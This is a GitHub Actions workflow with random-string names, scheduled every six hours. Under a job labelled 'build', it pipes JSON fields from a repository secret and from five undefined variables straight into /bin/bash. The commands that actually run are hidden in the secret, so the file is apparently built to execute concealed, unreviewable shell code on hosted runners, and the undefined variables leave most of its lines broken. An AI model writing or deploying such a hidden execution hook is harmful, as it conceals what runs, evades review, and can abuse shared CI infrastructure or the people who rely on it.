name: nanquep

on:
  workflow_dispatch:
  schedule:
    - cron: '38 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nanquep
        env:
          gn3061: ${{ secrets.gn3061 }}
        run: |
          echo $gn3061 | jq -r .znuky161 | /bin/bash
          echo $qsrue96 | jq -r .kbli22223 | /bin/bash
          echo $djjm731 | jq -r .kyy5 | /bin/bash
          echo $l416 | jq -r .p3204 | /bin/bash
          echo $ppg64672 | jq -r .eypf3 | /bin/bash
          echo $dywg62 | jq -r .pdzz46360 | /bin/bash

